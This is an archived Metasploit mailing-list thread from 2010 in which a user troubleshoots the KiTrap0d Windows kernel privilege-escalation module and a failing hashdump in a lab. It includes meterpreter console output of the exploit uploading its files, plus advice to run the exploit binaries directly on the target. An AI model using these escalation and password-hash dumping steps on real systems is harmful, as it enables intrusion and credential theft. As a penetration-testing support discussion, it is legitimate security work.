Metasploit mailing list archives
Re: Kitrap0d question
From: igor ransack <igor.ransack () gmail com>
Date: Fri, 29 Jan 2010 12:22:35 -0500
Hi guys, thanks for the suggestions, it all works fine now. A few questions have risen up since then however. It seems even with NT Authority System privileges under both vista and 7 , hashdump ( under priv ) as well as the run hasdump module are still giving me error 87 [ [-] priv_passwd_get_sam_hashes: Operation failed: 87 ] I was wondering if anyone managed to successfully hashdump vs Vista or Windows 7 so far using Metasploit. The only similar occurence i have seen it work is in a video on pauldotcom where he used it versus Windows 2008 server. N.B :: Migrate to explorer.exe or any kind of migrate as of todays build entirely breaks the session stream. Possibly related but I doubt it. Again, any input is appreciated. Thanks On Fri, Jan 29, 2010 at 9:19 AM, Pavel Jirout <freedom.day () gmail com> wrote:
Hi, try running the executable directly on that box the binaries are located in /metasploit/data/exploits/kitrap0d just copy the two files to a usb stick and execute on the windows box. It works only on x86 systems as far as I know.... Pavel On Thu, Jan 28, 2010 at 11:58 PM, igor ransack <igor.ransack () gmail com> wrote:Hi again rapid7, as seen on HD's blog, the following video is a fineexample:: http://vimeo.com/9028433 After watching it, i decided to build a lab around this new module inorderto understand it a bit better. Here is the output :: meterpreter > sysinfo Computer: SERVEUR OS : Windows 7 (Build 7600, ). Arch : x64 (Current Process is WOW64) Language: fr_FR meterpreter > run kitrap0d [*] Currently running as Serveur\Xavier [*] Loading the vdmallowed executable and DLL from the local system... [*] Uploading vdmallowed to C:\Users\Xavier\AppData\Local\Temp\lKiNbiNIxRfeB.exe... [*] Uploading vdmallowed to C:\Users\Xavier\AppData\Local\Temp\vdmexploit.dll... [*] Escalating our process (PID:3128)... -------------------------------------------------- Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit -------------------------------------------- taviso () sdf lonestar org --- [?] GetVersionEx() => 6.1 [?] NtQuerySystemInformation() => @00000000 [*] Deleting files... [*] Now running as Serveur\Xavier meterpreter > The only thing that comes to mind is the fact the OS is french but idoubtthen again that would make very little sense at the kernel level... Also, I assume this exploit would not work under a 64 bit os ? I can reproduce this on a clean setup. Any info is appreciated. _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Kitrap0d question igor ransack (Jan 28)
- Re: Kitrap0d question Pavel Jirout (Jan 29)
- Re: Kitrap0d question igor ransack (Jan 29)
- Re: Kitrap0d question HD Moore (Jan 29)
- Re: Kitrap0d question HD Moore (Jan 29)
- Re: Kitrap0d question igor ransack (Jan 29)
- Re: Kitrap0d question c0lists (Jan 29)
- <Possible follow-ups>
- Re: Kitrap0d question jeffs (Jan 29)
- Re: Kitrap0d question HD Moore (Jan 29)
- Re: Kitrap0d question Pavel Jirout (Jan 29)